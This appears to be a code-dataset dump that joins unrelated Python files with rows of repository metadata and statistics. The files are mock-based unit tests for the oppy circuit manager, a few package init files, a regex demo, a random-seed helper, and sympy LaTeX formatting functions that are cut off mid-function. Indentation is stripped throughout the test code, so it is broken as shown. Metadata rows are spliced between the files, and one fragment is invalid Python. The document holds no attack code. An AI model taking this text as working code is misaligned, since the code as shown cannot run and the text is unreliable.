# test specific correct stream added to pending streams
@mock.patch('oppy.stream.stream.Stream', autospec=True)
def test_getOpenCircuit_no_circuit(self, mock_stream):
r = mock.Mock()
mock_stream.request = r
self.cm._getOpenCandidates = mock.Mock()
self.cm._getOpenCandidates.return_value = []
self.cm._getPendingCandidates = mock.Mock()
self.cm._getPendingCandidates.return_value = []
self.cm._buildCircuit = mock.Mock()
self.cm._pending_stream_list = []
_ = self.cm.getOpenCircuit(mock_stream)
self.cm._getOpenCandidates.assert_called_once_with(r)
self.cm._getPendingCandidates.assert_called_once_with(r)
self.assertEqual(self.cm._buildCircuit.call_count, 1)
self.assertEqual(len(self.cm._pending_stream_list), 1)
def test_shouldDestroyCircuit_ipv4_yes(self):
c = mock.Mock()
c.circuit_type = CircuitType.IPv4
self.cm._totalIPv4Count = mock.Mock()
self.cm._totalIPv4Count.return_value = DEFAULT_OPEN_IPv4+2
self.assertTrue(self.cm.shouldDestroyCircuit(c))
def test_shouldDestroyCircuit_ipv4_no(self):
c = mock.Mock()
c.circuit_type = CircuitType.IPv4
self.cm._totalIPv4Count = mock.Mock()
self.cm._totalIPv4Count.return_value = DEFAULT_OPEN_IPv4
self.assertFalse(self.cm.shouldDestroyCircuit(c))
def test_shouldDestroyCircuit_ipv6_yes(self):
c = mock.Mock()
c.circuit_type = CircuitType.IPv6
self.cm._totalIPv6Count = mock.Mock()
self.cm._totalIPv6Count.return_value = DEFAULT_OPEN_IPv6+2
self.assertTrue(self.cm.shouldDestroyCircuit(c))
def test_shouldDestroyCircuit_ipv6_no(self):
c = mock.Mock()
c.circuit_type = CircuitType.IPv6
self.cm._totalIPv6Count = mock.Mock()
self.cm._totalIPv6Count.return_value = DEFAULT_OPEN_IPv6
self.assertFalse(self.cm.shouldDestroyCircuit(c))
def test_circuitDestroyed_open(self):
c = mock.Mock()
c.circuit_id = 10
self.cm._open_circuit_dict[10] = c
self.cm._assignAllPossiblePendingRequests = mock.Mock()
self.cm._buildCircuitsForOrphanedPendingRequests = mock.Mock()
self.cm._replenishCircuits = mock.Mock()
self.cm.circuitDestroyed(c)
self.assertTrue(c not in self.cm._open_circuit_dict.values())
self.assertEqual(self.cm._assignAllPossiblePendingRequests.call_count,
1)
self.assertEqual(
self.cm._buildCircuitsForOrphanedPendingRequests.call_count,
1)
self.assertEqual(self.cm._replenishCircuits.call_count, 1)
def test_circuitDestroyed_pending(self):
c = mock.Mock()
c.circuit_id = 10
self.cm._circuit_build_task_dict[10] = c
self.cm._assignAllPossiblePendingRequests = mock.Mock()
self.cm._buildCircuitsForOrphanedPendingRequests = mock.Mock()
self.cm._replenishCircuits = mock.Mock()
self.cm.circuitDestroyed(c)
self.assertTrue(c not in self.cm._circuit_build_task_dict.values())
self.assertEqual(self.cm._assignAllPossiblePendingRequests.call_count,
1)
self.assertEqual(
self.cm._buildCircuitsForOrphanedPendingRequests.call_count,
1)
self.assertEqual(self.cm._replenishCircuits.call_count, 1)
@mock.patch('oppy.circuit.circuitmanager.logging', autospec=True)
def test_circuitDestroyed_no_reference(self, mock_logging):
c = mock.Mock()
c.circuit_id = 10
self.cm._assignAllPossiblePendingRequests = mock.Mock()
self.cm._buildCircuitsForOrphanedPendingRequests = mock.Mock()
self.cm._replenishCircuits = mock.Mock()
self.cm.circuitDestroyed(c)
self.assertTrue(mock_logging.debug.called)
self.assertFalse(self.cm._assignAllPossiblePendingRequests.called)
self.assertFalse(
self.cm._buildCircuitsForOrphanedPendingRequests.called)
self.assertFalse(self.cm._replenishCircuits.called)
def test_circuitOpened(self):
c = mock.Mock()
c.circuit_id = 10
self.cm._assignPossiblePendingRequestsToCircuit = mock.Mock()
self.cm._notifyUserCircuitOpened = mock.Mock()
self.cm._circuit_build_task_dict[10] = c
self.cm.circuitOpened(c)
self.assertTrue(c not in self.cm._circuit_build_task_dict.values())
self.assertTrue(c in self.cm._open_circuit_dict.values())
self.assertEqual(
self.cm._assignPossiblePendingRequestsToCircuit.call_count, 1)
self.assertEqual(self.cm._notifyUserCircuitOpened.call_count, 1)
@mock.patch('oppy.circuit.circuitmanager.logging', autospec=True)
def test_circuitOpened_no_reference(self, mock_logging):
c = mock.Mock()
c.circuit_id = 10
self.cm._assignPossiblePendingRequestsToCircuit = mock.Mock()
self.cm._notifyUserCircuitOpened = mock.Mock()
self.cm.circuitOpened(c)
self.assertTrue(c not in self.cm._open_circuit_dict.values())
self.assertFalse(
self.cm._assignPossiblePendingRequestsToCircuit.called)
self.assertFalse(self.cm._notifyUserCircuitOpened.called)
self.assertEqual(mock_logging.debug.call_count, 2)
def test_destroyAllCircuits_with_streams(self):
mock_stream = mock.Mock()
self.cm._pending_stream_list = [mock_stream]
mock_open_circuit = mock.Mock()
self.cm._open_circuit_dict = {1: mock_open_circuit}
mock_circuit_build_task = mock.Mock()
self.cm._circuit_build_task_dict = {2: mock_circuit_build_task}
self.cm.destroyAllCircuits()
self.assertEqual(len(self.cm._pending_stream_list), 0)
self.assertEqual(
mock_open_circuit.destroyCircuitFromManager.call_count, 1)
self.assertEqual(
mock_circuit_build_task.destroyCircuitFromManager.call_count,
1)
def test_destroyAllCircuits_without_streams(self):
mock_stream = mock.Mock()
self.cm._pending_stream_list = [mock_stream]
mock_open_circuit = mock.Mock()
self.cm._open_circuit_dict = {1: mock_open_circuit}
mock_circuit_build_task = mock.Mock()
self.cm._circuit_build_task_dict = {2: mock_circuit_build_task}
self.cm.destroyAllCircuits(destroy_pending_streams=False)
self.assertTrue(mock_stream in self.cm._pending_stream_list)
self.assertEqual(
mock_open_circuit.destroyCircuitFromManager.call_count, 1)
self.assertEqual(
mock_circuit_build_task.destroyCircuitFromManager.call_count,
1)
def test_buildCircuitsForOrphanedRequests(self):
mock_stream = mock.Mock()
mock_stream.request = mock.Mock()
self.cm._pending_stream_list = [mock_stream]
self.cm._getPendingCandidates = mock.Mock()
self.cm._getPendingCandidates.return_value = []
self.cm._buildCircuitsForPendingStreams = mock.Mock()
self.cm._buildCircuitsForOrphanedPendingRequests()
self.cm._buildCircuitsForPendingStreams.assert_called_once_with(
[mock_stream])
@mock.patch('oppy.circuit.circuitmanager.logging', autospec=True)
def test_notifyUserCircuitOpened_not_notified_yet(self, mock_logging):
self.cm._sent_open_message = False
self.cm._notifyUserCircuitOpened()
self.assertEqual(mock_logging.info.call_count, 1)
self.assertTrue(self.cm._sent_open_message)
@mock.patch('oppy.circuit.circuitmanager.logging', autospec=True)
def test_notifyUserCircuitOpened_notified_already(self, mock_logging):
self.cm._sent_open_message = True
self.cm._notifyUserCircuitOpened()
self.assertEqual(mock_logging.info.call_count, 0)
self.assertTrue(self.cm._sent_open_message)
@mock.patch('oppy.circuit.circuitmanager.PendingStream', autospec=True)
def test_assignPossiblePendingRequestsToCircuit_yes(self,
mock_pending_stream):
mock_request = mock.Mock()
mock_deferred = mock.Mock()
mock_pending_stream.stream.request = mock_request
mock_pending_stream.deferred = mock_deferred
mock_circuit = mock.Mock()
mock_circuit.canHandleRequest = mock.Mock()
mock_circuit.canHandleRequest.return_value = True
self.cm._pending_stream_list = [mock_pending_stream]
self.cm._assignPossiblePendingRequestsToCircuit(mock_circuit)
mock_circuit.canHandleRequest.assert_called_once_with(mock_request)
mock_deferred.callback.assert_called_once_with(mock_circuit)
self.assertTrue(mock_pending_stream not in
self.cm._pending_stream_list)
self.assertEqual(len(self.cm._pending_stream_list), 0)
@mock.patch('oppy.circuit.circuitmanager.PendingStream', autospec=True)
def test_assignPossiblePendingRequests_none(self, mock_pending_stream):
mock_request = mock.Mock()
mock_deferred = mock.Mock()
mock_pending_stream.stream.request = mock_request
mock_pending_stream.deferred = mock_deferred
mock_circuit = mock.Mock()
mock_circuit.canHandleRequest = mock.Mock()
mock_circuit.canHandleRequest.return_value = False
self.cm._pending_stream_list = [mock_pending_stream]
self.cm._assignPossiblePendingRequestsToCircuit(mock_circuit)
mock_circuit.canHandleRequest.assert_called_once_with(mock_request)
self.assertEqual(mock_deferred.callback.call_count, 0)
self.assertTrue(mock_pending_stream in
self.cm._pending_stream_list)
self.assertEqual(len(self.cm._pending_stream_list), 1)
@mock.patch('oppy.circuit.circuitmanager.PendingStream', autospec=True)
def test_assignAllPossiblePendingRequests(self, mock_pending_stream):
mock_circuit_1 = mock.Mock()
mock_circuit_2 = mock.Mock()
self.cm._open_circuit_dict = {1: mock_circuit_1, 2: mock_circuit_2}
self.cm._assignPossiblePendingRequestsToCircuit = mock.Mock()
self.cm._assignAllPossiblePendingRequests()
self.assertEqual(
self.cm._assignPossiblePendingRequestsToCircuit.call_count, 2)
@mock.patch('oppy.circuit.circuitmanager.CircuitBuildTask', autospec=True)
def test_buildCircuit(self, mock_circuit_build_task):
self.cm._buildCircuit()
self.assertEqual(mock_circuit_build_task.call_count, 1)
self.assertEqual(len(self.cm._circuit_build_task_dict), 1)
def test_buildCircuits(self):
self.cm._buildCircuit = mock.Mock()
self.cm._buildCircuits(5)
self.assertEqual(self.cm._buildCircuit.call_count, 5)
def test_buildCircuitsForPendingStreams(self):
mock_pending_stream = mock.Mock()
mock_request = mock.Mock()
mock_pending_stream.request = mock_request
self.cm._buildCircuit = mock.Mock()
self.cm._buildCircuitsForPendingStreams([mock_pending_stream])
self.assertEqual(self.cm._buildCircuit.call_count, 1)
def test_replenishCircuits_none(self):
self.cm._buildCircuit = mock.Mock()
self.cm._totalIPv4Count = mock.Mock()
self.cm._totalIPv4Count.return_value = self.cm._min_IPv4_count
self.cm._totalIPv6Count = mock.Mock()
self.cm._totalIPv6Count.return_value = self.cm._min_IPv6_count
self.cm._replenishCircuits()
self.assertEqual(self.cm._buildCircuit.call_count, 0)
# TODO: check call_args for correct type
def test_replenishCircuits_ipv4(self):
self.cm._buildCircuit = mock.Mock()
self.cm._totalIPv4Count = mock.Mock()
self.cm._totalIPv4Count.return_value = self.cm._min_IPv4_count-1
self.cm._totalIPv6Count = mock.Mock()
self.cm._totalIPv6Count.return_value = self.cm._min_IPv6_count
self.cm._replenishCircuits()
self.assertEqual(self.cm._buildCircuit.call_count, 1)
def test_replenishCircuits_ipv6(self):
self.cm._buildCircuit = mock.Mock()
self.cm._totalIPv4Count = mock.Mock()
self.cm._totalIPv4Count.return_value = self.cm._min_IPv4_count
self.cm._totalIPv6Count = mock.Mock()
self.cm._totalIPv6Count.return_value = self.cm._min_IPv6_count-1
self.cm._replenishCircuits()
self.assertEqual(self.cm._buildCircuit.call_count, 1)
def test_replenishCircuits_both(self):
self.cm._buildCircuit = mock.Mock()
self.cm._totalIPv4Count = mock.Mock()
self.cm._totalIPv4Count.return_value = self.cm._min_IPv4_count-1
self.cm._totalIPv6Count = mock.Mock()
self.cm._totalIPv6Count.return_value = self.cm._min_IPv6_count-1
self.cm._replenishCircuits()
self.assertEqual(self.cm._buildCircuit.call_count, 2)
def test_openIPv4Count(self):
mock_circuit_1 = mock.Mock()
mock_circuit_1.circuit_type = CircuitType.IPv4
mock_circuit_2 = mock.Mock()
mock_circuit_2.circuit_type = CircuitType.IPv6
self.cm._open_circuit_dict = {1: mock_circuit_1, 2: mock_circuit_2}
self.assertEqual(self.cm._openIPv4Count(), 1)
def test_openIPv6Count(self):
mock_circuit_1 = mock.Mock()
mock_circuit_1.circuit_type = CircuitType.IPv4
mock_circuit_2 = mock.Mock()
mock_circuit_2.circuit_type = CircuitType.IPv6
self.cm._open_circuit_dict = {1: mock_circuit_1, 2: mock_circuit_2}
self.assertEqual(self.cm._openIPv6Count(), 1)
def test_pendingIPv4Count(self):
mock_circuit_1 = mock.Mock()
mock_circuit_1.circuit_type = CircuitType.IPv4
mock_circuit_2 = mock.Mock()
mock_circuit_2.circuit_type = CircuitType.IPv6
self.cm._circuit_build_task_dict = {1: mock_circuit_1,
2: mock_circuit_2}
self.assertEqual(self.cm._pendingIPv4Count(), 1)
def test_pendingIPv6Count(self):
mock_circuit_1 = mock.Mock()
mock_circuit_1.circuit_type = CircuitType.IPv4
mock_circuit_2 = mock.Mock()
mock_circuit_2.circuit_type = CircuitType.IPv6
self.cm._circuit_build_task_dict = {1: mock_circuit_1,
2: mock_circuit_2}
self.assertEqual(self.cm._pendingIPv6Count(), 1)
def test_totalIPv4Count(self):
mock_circuit_1 = mock.Mock()
mock_circuit_1.circuit_type = CircuitType.IPv4
mock_circuit_2 = mock.Mock()
mock_circuit_2.circuit_type = CircuitType.IPv6
self.cm._circuit_build_task_dict = {1: mock_circuit_1,
2: mock_circuit_2}
self.cm._open_circuit_dict = {1: mock_circuit_1, 2: mock_circuit_2}
self.assertEqual(self.cm._totalIPv4Count(), 2)
def test_totalIPv6Count(self):
mock_circuit_1 = mock.Mock()
mock_circuit_1.circuit_type = CircuitType.IPv4
mock_circuit_2 = mock.Mock()
mock_circuit_2.circuit_type = CircuitType.IPv6
self.cm._circuit_build_task_dict = {1: mock_circuit_1,
2: mock_circuit_2}
self.cm._open_circuit_dict = {1: mock_circuit_1, 2: mock_circuit_2}
self.assertEqual(self.cm._totalIPv6Count(), 2)
def test_getOpenCandidates(self):
mock_circuit_1 = mock.Mock()
mock_circuit_2 = mock.Mock()
mock_circuit_3 = mock.Mock()
mock_circuit_1.canHandleRequest = mock.Mock()
mock_circuit_2.canHandleRequest = mock.Mock()
mock_circuit_3.canHandleRequest = mock.Mock()
mock_circuit_1.canHandleRequest.return_value = True
mock_circuit_2.canHandleRequest.return_value = True
mock_circuit_3.canHandleRequest.return_value = False
self.cm._open_circuit_dict = {1: mock_circuit_1,
2: mock_circuit_2,
3: mock_circuit_3,}
test_val = [mock_circuit_1, mock_circuit_2]
self.assertEqual(self.cm._getOpenCandidates(mock.Mock()), test_val)
def test_getPendingCandidates(self):
mock_circuit_1 = mock.Mock()
mock_circuit_2 = mock.Mock()
mock_circuit_3 = mock.Mock()
mock_circuit_1.canHandleRequest = mock.Mock()
mock_circuit_2.canHandleRequest = mock.Mock()
mock_circuit_3.canHandleRequest = mock.Mock()
mock_circuit_1.canHandleRequest.return_value = True
mock_circuit_2.canHandleRequest.return_value = True
mock_circuit_3.canHandleRequest.return_value = False
self.cm._circuit_build_task_dict = {1: mock_circuit_1,
2: mock_circuit_2,
3: mock_circuit_3,}
test_val = [mock_circuit_1, mock_circuit_2]
self.assertEqual(self.cm._getPendingCandidates(mock.Mock()), test_val)
| 39.673469 | 78 | 0.681276 | 2,214 | 19,440 | 5.650858 | 0.056911 | 0.085365 | 0.047958 | 0.055951 | 0.839022 | 0.79506 | 0.787067 | 0.764367 | 0.742786 | 0.724882 | 0 | 0.015654 | 0.227778 | 19,440 | 489 | 79 | 39.754601 | 0.817746 | 0.011317 | 0 | 0.696237 | 0 | 0 | 0.024304 | 0.024304 | 0 | 0 | 0 | 0.002045 | 0.193548 | 1 | 0.096774 | false | 0 | 0.013441 | 0 | 0.112903 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
67e56606e3bf5354fda434ade40a481c6d3d5cd3 | 107 | py | Python | idealreport/__init__.py | idealprediction/idealreport | 62f6dfdd56b711e81b64f2d25995108dad3f0844 | [
"MIT"
] | 3 | 2016-07-08T18:07:57.000Z | 2018-08-15T01:10:17.000Z | idealreport/__init__.py | idealprediction/idealreport | 62f6dfdd56b711e81b64f2d25995108dad3f0844 | [
"MIT"
] | null | null | null | idealreport/__init__.py | idealprediction/idealreport | 62f6dfdd56b711e81b64f2d25995108dad3f0844 | [
"MIT"
] | 1 | 2018-02-12T03:49:39.000Z | 2018-02-12T03:49:39.000Z | from idealreport import create_html
from idealreport.reporter import Reporter
from idealreport import plot
| 26.75 | 41 | 0.878505 | 14 | 107 | 6.642857 | 0.5 | 0.483871 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11215 | 107 | 3 | 42 | 35.666667 | 0.978947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
db00331ae2ca4c25ba29194474c8d8109c45edd4 | 13 | py | Python | lab1/lex/t.py | CXWorks/compilerLab | 97654acec4ab742b6ec9e1c555e1eab607d3d9a9 | [
"MIT"
] | 3 | 2018-05-04T07:41:21.000Z | 2018-11-16T14:09:29.000Z | lab1/lex/t.py | CXWorks/compilerLab | 97654acec4ab742b6ec9e1c555e1eab607d3d9a9 | [
"MIT"
] | null | null | null | lab1/lex/t.py | CXWorks/compilerLab | 97654acec4ab742b6ec9e1c555e1eab607d3d9a9 | [
"MIT"
] | 3 | 2017-10-24T11:26:12.000Z | 2019-06-05T06:10:33.000Z | a=0110
b=233
| 4.333333 | 6 | 0.692308 | 4 | 13 | 2.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.636364 | 0.153846 | 13 | 2 | 7 | 6.5 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
db13b36f2eb399f56f8436032f17295688f0bd52 | 163 | py | Python | ed/l/python/examples/whatever/regex.py | cn007b/stash | bae604d3056f09b9b6c6b3e0282f02c829801f5c | [
"MIT"
] | null | null | null | ed/l/python/examples/whatever/regex.py | cn007b/stash | bae604d3056f09b9b6c6b3e0282f02c829801f5c | [
"MIT"
] | null | null | null | ed/l/python/examples/whatever/regex.py | cn007b/stash | bae604d3056f09b9b6c6b3e0282f02c829801f5c | [
"MIT"
] | 1 | 2021-11-26T05:40:08.000Z | 2021-11-26T05:40:08.000Z | import re
def anum(s: str) -> bool:
return re.search(r'^[\d\w]+$', s)
print(anum('1'))
print(anum('x'))
print(anum('x_'))
print(anum('x-'))
print(anum('='))
| 12.538462 | 35 | 0.558282 | 28 | 163 | 3.214286 | 0.535714 | 0.5 | 0.333333 | 0.5 | 0.433333 | 0.433333 | 0.433333 | 0.433333 | 0 | 0 | 0 | 0.007042 | 0.128834 | 163 | 12 | 36 | 13.583333 | 0.626761 | 0 | 0 | 0 | 0 | 0 | 0.09816 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0.125 | 0.375 | 0.625 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 6 |
db1dd163c3f236a8b5eedd427d2ddb20812c2f62 | 45 | py | Python | c2nl/utils/__init__.py | chengjunyan1/GN-Transformer-AST | 95b92da9addd694fceeded875bcc56369548322d | [
"Apache-2.0"
] | 8 | 2021-01-20T09:30:41.000Z | 2022-03-01T21:36:25.000Z | c2nl/utils/__init__.py | chengjunyan1/GN-Transformer-AST | 95b92da9addd694fceeded875bcc56369548322d | [
"Apache-2.0"
] | 1 | 2022-01-21T06:30:34.000Z | 2022-03-01T21:35:01.000Z | c2nl/utils/__init__.py | chengjunyan1/GN-Transformer-AST | 95b92da9addd694fceeded875bcc56369548322d | [
"Apache-2.0"
] | 1 | 2022-02-21T22:58:28.000Z | 2022-02-21T22:58:28.000Z | from .logging import *
from .misc import *
| 15 | 23 | 0.688889 | 6 | 45 | 5.166667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 45 | 2 | 24 | 22.5 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e1fdbbadf49c80cec4ae80a81d5061fa8a08da0a | 56 | py | Python | sequencing_tools/stats_tools/__init__.py | wckdouglas/tgirt_seq_tools | 0ab6683ca6b5b748b7d7af7f77dc556f16ccf6f6 | [
"MIT"
] | 7 | 2019-03-12T07:37:53.000Z | 2021-06-23T20:29:35.000Z | sequencing_tools/stats_tools/__init__.py | wckdouglas/sequencing_tools | 0ab6683ca6b5b748b7d7af7f77dc556f16ccf6f6 | [
"MIT"
] | null | null | null | sequencing_tools/stats_tools/__init__.py | wckdouglas/sequencing_tools | 0ab6683ca6b5b748b7d7af7f77dc556f16ccf6f6 | [
"MIT"
] | null | null | null | from sequencing_tools.stats_tools._stats_tools import *
| 28 | 55 | 0.875 | 8 | 56 | 5.625 | 0.625 | 0.444444 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 56 | 1 | 56 | 56 | 0.865385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c028d44e4f8c8a0717887c2ee2ddda8272f9cd32 | 462 | py | Python | neurodsp/utils/sim.py | bcmartinb/neurodsp | 36d8506f3bd916f83b093a62843ffb77647a6e1e | [
"Apache-2.0"
] | 154 | 2019-01-30T04:10:48.000Z | 2022-03-30T12:55:00.000Z | neurodsp/utils/sim.py | bcmartinb/neurodsp | 36d8506f3bd916f83b093a62843ffb77647a6e1e | [
"Apache-2.0"
] | 159 | 2019-01-28T22:49:36.000Z | 2022-03-17T16:42:48.000Z | neurodsp/utils/sim.py | bcmartinb/neurodsp | 36d8506f3bd916f83b093a62843ffb77647a6e1e | [
"Apache-2.0"
] | 42 | 2019-05-31T21:06:44.000Z | 2022-03-25T23:17:57.000Z | """Simulation related utility functions."""
import numpy as np
###################################################################################################
###################################################################################################
def set_random_seed(seed_val=0):
"""Set the random seed value.
Parameters
----------
seed_val : int
Value to set the random seed as.
"""
np.random.seed(seed_val)
| 25.666667 | 99 | 0.350649 | 36 | 462 | 4.361111 | 0.527778 | 0.254777 | 0.178344 | 0.216561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002538 | 0.147186 | 462 | 17 | 100 | 27.176471 | 0.395939 | 0.300866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c069301a216c7f3850ab3dba98edf8ee4f13f1ea | 36 | py | Python | src/coolbeans/extort/__init__.py | runarp/coolbeans | 128a7f2e45690d2d22b05608e555c44334f46859 | [
"MIT"
] | 5 | 2020-05-17T04:48:25.000Z | 2022-01-27T09:36:45.000Z | src/coolbeans/extort/__init__.py | runarp/coolbeans | 128a7f2e45690d2d22b05608e555c44334f46859 | [
"MIT"
] | 1 | 2020-05-17T06:21:52.000Z | 2020-05-22T13:49:33.000Z | src/coolbeans/extort/__init__.py | runarp/coolbeans | 128a7f2e45690d2d22b05608e555c44334f46859 | [
"MIT"
] | 1 | 2021-01-28T03:00:27.000Z | 2021-01-28T03:00:27.000Z | from .base import ExtortionProtocol
| 18 | 35 | 0.861111 | 4 | 36 | 7.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.96875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fbfa8e5142b3c8fc60f483337d70281339c2b543 | 22,529 | py | Python | ipy_course_tools/formula.py | edualphacruncher/ipy-course-tools | 3ff9145609dc98c8b0e7823688a136a843f2312a | [
"MIT"
] | null | null | null | ipy_course_tools/formula.py | edualphacruncher/ipy-course-tools | 3ff9145609dc98c8b0e7823688a136a843f2312a | [
"MIT"
] | null | null | null | ipy_course_tools/formula.py | edualphacruncher/ipy-course-tools | 3ff9145609dc98c8b0e7823688a136a843f2312a | [
"MIT"
] | null | null | null | from sympy.interactive import printing
from sympy import Matrix, MatrixSymbol, Symbol, poly
from sympy.abc import x
from IPython.display import Math
import itertools
def show_formula(symbol, value, formula_op="=", formula_align=False, display=False):
"""Pretty print a sympy formula. This embeds the formula expression a LaTeX equation with a proper LHS, making it possible to name matrices, expressions in output, etc.
Args:
symbol (string): A standard LaTeX string you would like to be on the LHS of a pretty print.
        value (sympy expression): The sympy expression you would like to pretty print.
formula_op (str, optional): LaTeX operator symbol. Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
if formula_align:
op = f"&{formula_op}"
else:
op = f"{formula_op}"
ret_text = f"{symbol} {op} {printing.default_latex(value)}"
if not display:
return ret_text
else:
return Math(ret_text)
def show_matrix(symbol, matrix, formula_op="=", formula_align=False, display=False):
"""Pretty print a sympy matrix object. This embeds the Matrix render into a LaTeX equation with a proper LHS, making it possible to name matrices in output, etc.
Args:
symbol (string): A standard LaTeX string you would like to be on the LHS of a pretty print.
matrix (sympy.Matrix): The sympy Matrix object you would like to pretty print.
formula_op (str, optional): LaTeX operator symbol. Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
return show_formula(
symbol=symbol,
value=matrix,
formula_op=formula_op,
formula_align=formula_align,
display=display,
)
def eval_formula(formula, display=False):
"""Pretty print generic sympy formulaic expression.
Args:
formula (sympy expression): Sympy expression to render.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
ret_text = printing.default_latex(formula)
if not display:
return ret_text
else:
return Math(ret_text)
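If SymPy is installed, the printing core these helpers share can be exercised directly; the `f(x)` label is purely illustrative, and the exact LaTeX string depends on SymPy's printer version.

```python
from sympy.abc import x
from sympy.interactive import printing

# The essence of show_formula: a LaTeX LHS label, an operator, and the printed RHS
expr = (x + 1)**2
line = f"f(x) = {printing.default_latex(expr)}"
print(line)  # e.g. f(x) = \left(x + 1\right)^{2}
```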
def unary_bracket(
x,
formula=None,
lbracket_string="(",
rbracket_string=")",
formula_op="=",
formula_align=False,
subscript=None,
display=False,
x_latex=False,
formula_latex=False,
formula_suffix=True,
):
"""Internal function to pretty print all unary bracketed formulae with sympy. In particular norms, absolute values, etc. can be printed with this.
Args:
x (string or sympy expression): Content of unary symbol you want to pretty print.
        formula (sympy expression or LaTeX string, optional): Additional artifacts you want to render along your unary. Either "evaluates to" or "is equal to" would be good ways to interpret what to put here. Defaults to None.
lbracket_string (str, optional): LaTeX bracket type on the left hand side of the unary. Defaults to "(".
rbracket_string (str, optional): LaTeX bracket type on the right hand side of the unary. Defaults to ")".
formula_op (str, optional): If there is a formula, what should be the operator that separates the formula from the unary? Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
        subscript (str, optional): Add a subscript to the right hand bracket if not None. Defaults to None.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
x_latex (bool, optional): Whether the content of the unary is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_latex (bool, optional): Whether the content of the formula is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_suffix (bool, optional): Whether formula comes first (False) or the unary (True). Defaults to True.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
if not x_latex:
x_text = printing.default_latex(x)
else:
